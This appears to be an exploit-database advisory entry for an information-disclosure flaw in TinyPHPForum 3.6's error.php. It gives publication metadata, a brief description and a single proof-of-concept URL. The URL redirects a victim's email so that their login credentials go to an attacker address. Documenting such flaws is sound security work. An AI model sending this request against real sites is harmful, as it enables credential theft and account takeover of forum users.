TinyPHPForum 3.6 - 'error.php' Information Disclosure

Author: SirDarckCat
type: webapps
platform: php
port: 
date_added: 2006-08-01  
date_updated: 2016-12-22  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 28322.txt  

source: https://www.securityfocus.com/bid/19278/info

TinyPHPForum is prone to an information-disclosure vulnerability. This issue arises when a script allows a remote untrusted source to change a victim user's email address, and have their login credentials returned to an attacker.

Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.

http://www.example.com/error.php?err=200&uname=victim&email=attacker@example.com